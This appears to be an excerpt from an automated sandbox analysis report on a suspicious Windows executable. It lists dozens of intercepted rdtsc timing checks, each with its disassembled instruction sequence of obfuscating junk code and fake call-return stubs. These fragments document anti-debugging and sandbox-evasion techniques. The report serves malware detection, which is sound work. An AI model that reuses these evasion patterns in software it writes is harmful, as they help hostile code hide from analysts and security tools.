                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B857B second address: 10B85C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF30CF3CAEBh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D2C4Fh] 0x00000014 push 00000000h 0x00000016 sub edi, dword ptr [ebp+122D2164h] 0x0000001c mov di, dx 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+122D17E3h], esi 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push ebx 0x0000002b jmp 00007FF30CF3CAF9h 0x00000030 pop ebx 0x00000031 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B85C6 second address: 10B85CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B85CC second address: 10B85D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B86FA second address: 10B870B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jl 00007FF30D194DBCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10BA4DF second address: 10BA4E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10BB42F second address: 10BB4AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF30D194DBFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FF30D194DB8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a jc 00007FF30D194DB8h 0x00000030 mov bl, 39h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007FF30D194DB8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 mov bl, 50h 0x00000053 pop ebx 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 jmp 00007FF30D194DC1h 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10BC473 second address: 10BC477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10BE4A9 second address: 10BE4AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10BE4AE second address: 10BE4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10BEA7C second address: 10BEAE3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push ecx 0x0000000e mov edi, edx 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FF30D194DB8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+122D35ECh] 0x00000033 movsx ebx, bx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007FF30D194DB8h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D37BBh], ebx 0x00000058 clc 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C0A9F second address: 10C0AC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF30CF3CAEAh 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10BEC64 second address: 10BEC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF30D194DBAh 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10BEC90 second address: 10BED22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FF30CF3CAE8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov edi, 37916BB8h 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007FF30CF3CAE8h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f xor ebx, 0D6A4E82h 0x00000055 mov eax, dword ptr [ebp+122D0E61h] 0x0000005b jp 00007FF30CF3CAEBh 0x00000061 push FFFFFFFFh 0x00000063 mov di, CB66h 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b push eax 0x0000006c pop eax 0x0000006d jmp 00007FF30CF3CAF8h 0x00000072 popad 0x00000073 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C1AE8 second address: 10C1AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C0C5F second address: 10C0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C0C63 second address: 10C0CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF30D194DC7h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FF30D194DB6h 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C0CA0 second address: 10C0CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C0CB7 second address: 10C0CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C0CBD second address: 10C0CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C3A27 second address: 10C3A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C0CC1 second address: 10C0D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnl 00007FF30CF3CAEBh 0x0000000f sub dword ptr [ebp+122D1D0Fh], edi 0x00000015 push dword ptr fs:[00000000h] 0x0000001c movzx edi, di 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FF30CF3CAE8h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 mov bx, si 0x00000043 mov dword ptr [ebp+1245F05Ah], edx 0x00000049 mov eax, dword ptr [ebp+122D0EC5h] 0x0000004f mov ebx, dword ptr [ebp+122D2AD3h] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push esi 0x0000005a call 00007FF30CF3CAE8h 0x0000005f pop esi 0x00000060 mov dword ptr [esp+04h], esi 0x00000064 add dword ptr [esp+04h], 00000015h 0x0000006c inc esi 0x0000006d push esi 0x0000006e ret 0x0000006f pop esi 0x00000070 ret 0x00000071 push eax 0x00000072 push esi 0x00000073 push edi 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 105D824 second address: 105D829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 105D829 second address: 105D82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C6189 second address: 10C619A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF30D194DB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C619A second address: 10C61B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF30CF3CAF3h 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C61B7 second address: 10C61C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FF30D194DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C61C3 second address: 10C61C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C61C8 second address: 10C61E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC1h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C7887 second address: 10C788D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10C788D second address: 10C7892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10CCB46 second address: 10CCB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D10DF second address: 10D10E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D10E3 second address: 10D1138 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jnp 00007FF30CF3CAF2h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jl 00007FF30CF3CAECh 0x00000023 pushad 0x00000024 push esi 0x00000025 pop esi 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push ebx 0x00000030 jmp 00007FF30CF3CAF8h 0x00000035 pop ebx 0x00000036 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D120E second address: 10D1250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c js 00007FF30D194DC6h 0x00000012 pop esi 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007FF30D194DB6h 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D1250 second address: 10D1285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push eax 0x0000000e jng 00007FF30CF3CAE6h 0x00000014 pop eax 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FF30CF3CAE8h 0x00000022 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D1285 second address: 10D129A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DC1h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D129A second address: 10D129E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D130F second address: EFE89F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF30D194DB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 44ACAD1Fh 0x00000011 pushad 0x00000012 sub edi, 40A82CF3h 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b push dword ptr [ebp+122D1589h] 0x00000021 jg 00007FF30D194DCFh 0x00000027 jo 00007FF30D194DC9h 0x0000002d jmp 00007FF30D194DC3h 0x00000032 call dword ptr [ebp+122D1A53h] 0x00000038 pushad 0x00000039 jbe 00007FF30D194DB7h 0x0000003f jmp 00007FF30D194DC9h 0x00000044 xor eax, eax 0x00000046 mov dword ptr [ebp+122D35B4h], ecx 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 cld 0x00000051 mov dword ptr [ebp+122D291Bh], eax 0x00000057 clc 0x00000058 mov esi, 0000003Ch 0x0000005d pushad 0x0000005e pushad 0x0000005f or ch, 00000061h 0x00000062 mov dl, 3Ch 0x00000064 popad 0x00000065 mov al, cl 0x00000067 popad 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c sub dword ptr [ebp+122D1B63h], edi 0x00000072 lodsw 0x00000074 jo 00007FF30D194DC2h 0x0000007a jns 00007FF30D194DBCh 0x00000080 add eax, dword ptr [esp+24h] 0x00000084 jng 00007FF30D194DC5h 0x0000008a jmp 00007FF30D194DBFh 0x0000008f mov ebx, dword ptr [esp+24h] 0x00000093 jmp 00007FF30D194DBAh 0x00000098 nop 0x00000099 push eax 0x0000009a push edx 0x0000009b push eax 0x0000009c push edx 0x0000009d push eax 0x0000009e pop eax 0x0000009f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D6A56 second address: 10D6A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D6A5C second address: 10D6A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D6A62 second address: 10D6A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10D6A66 second address: 10D6A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10DB2D9 second address: 10DB2DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10DA1AD second address: 10DA1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ACFED second address: 108F881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF30CF3CAE6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f stc 0x00000010 call dword ptr [ebp+122D365Fh] 0x00000016 pushad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FF30CF3CAF8h 0x0000001f pop ecx 0x00000020 jmp 00007FF30CF3CAF2h 0x00000025 pushad 0x00000026 jng 00007FF30CF3CAE6h 0x0000002c je 00007FF30CF3CAE6h 0x00000032 popad 0x00000033 popad 0x00000034 pushad 0x00000035 jmp 00007FF30CF3CAF4h 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10AD0A9 second address: 10AD0AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10AD740 second address: 10AD746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10AD746 second address: 10AD78D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jno 00007FF30D194DC2h 0x00000013 xchg eax, esi 0x00000014 movsx ecx, bx 0x00000017 nop 0x00000018 push ebx 0x00000019 jg 00007FF30D194DC1h 0x0000001f jmp 00007FF30D194DBBh 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF30D194DBBh 0x0000002f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10AD78D second address: 10AD793 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ADE74 second address: 10ADE7E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF30D194DBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10AE280 second address: 10AE284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10AE284 second address: 10AE2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a adc dx, 8616h 0x0000000f lea eax, dword ptr [ebp+12481D7Dh] 0x00000015 or ecx, dword ptr [ebp+12447954h] 0x0000001b cld 0x0000001c push eax 0x0000001d jns 00007FF30D194DBEh 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10AE2AA second address: 10AE306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 sub ecx, 51B6599Fh 0x0000000e lea eax, dword ptr [ebp+12481D39h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FF30CF3CAE8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push ecx 0x0000002f sub dword ptr [ebp+12468114h], eax 0x00000035 pop edi 0x00000036 nop 0x00000037 jmp 00007FF30CF3CAECh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FF30CF3CAF0h 0x00000044 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10AE306 second address: 10AE311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FF30D194DB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10643DA second address: 10643DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10643DE second address: 10643F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF30D194DBEh 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10643F5 second address: 10643FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10DA755 second address: 10DA75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10DA75B second address: 10DA763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10DA8E1 second address: 10DA8E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10DABB7 second address: 10DABD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF30CF3CAF2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10DAEBC second address: 10DAEC6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E2CD1 second address: 10E2CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FF30CF3CAE6h 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FF30CF3CAF0h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E2CF3 second address: 10E2CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E2CFB second address: 10E2D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E2E67 second address: 10E2E71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E2E71 second address: 10E2E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF30CF3CAE6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E3322 second address: 10E3339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF30D194DC1h 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E3339 second address: 10E333F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E333F second address: 10E3345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
